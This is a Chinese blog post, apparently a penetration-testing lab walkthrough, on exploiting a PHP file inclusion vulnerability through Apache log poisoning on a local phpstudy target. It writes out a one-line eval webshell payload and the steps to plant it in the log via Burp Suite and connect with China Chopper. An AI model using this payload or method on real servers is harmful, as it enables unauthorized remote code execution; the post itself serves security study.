文件包含漏洞——配合日志文件

此实验中用的是phpstudy2018
靶机IP地址:192.168.212.131

一、前提条件

phpstudy中日志功能默认关闭,得手动修改配置文件开启apache日志功能
在这里插入图片描述
重启phpstudy,访问日志文件存在
在这里插入图片描述

二、文件包含漏洞测试

第一步:输入<?php phpinfo();?>进行测试
在这里插入图片描述
利用文件包含漏洞查看各个输入的内容是否存在与日志文件内
在这里插入图片描述
发现<?php phpinfo();?>已被转义成%3C?php%20phpinfo();?%3E
第二步:既然被转移,那就结合burpsuite抓包修改
开启burpsuite抓包,输入<?php phpinfo();?>继续进行测试
在这里插入图片描述
拦包修改被转义的内容
在这里插入图片描述
在这里插入图片描述
修改之后放包,再去文件包含日志文件,发现<?php phpinfo();?>已被执行
在这里插入图片描述

三、文件包含漏洞利用

第一步:输入一句话 <?php @eval($_POST[x]);?>
在这里插入图片描述
拦包修改被转义的内容
在这里插入图片描述
在这里插入图片描述
第二步:访问日志文件,查看没有一句话 内容,说明一句话 muma被当作php语言正常解析运行了
在这里插入图片描述
第三步:中国菜刀连接muma文件
在这里插入图片描述
添加成功之后,双击查看,成功链接
在这里插入图片描述
更多资源:

1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程

收集整理在知识星球,可加入知识星球进行查看。
在这里插入图片描述

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值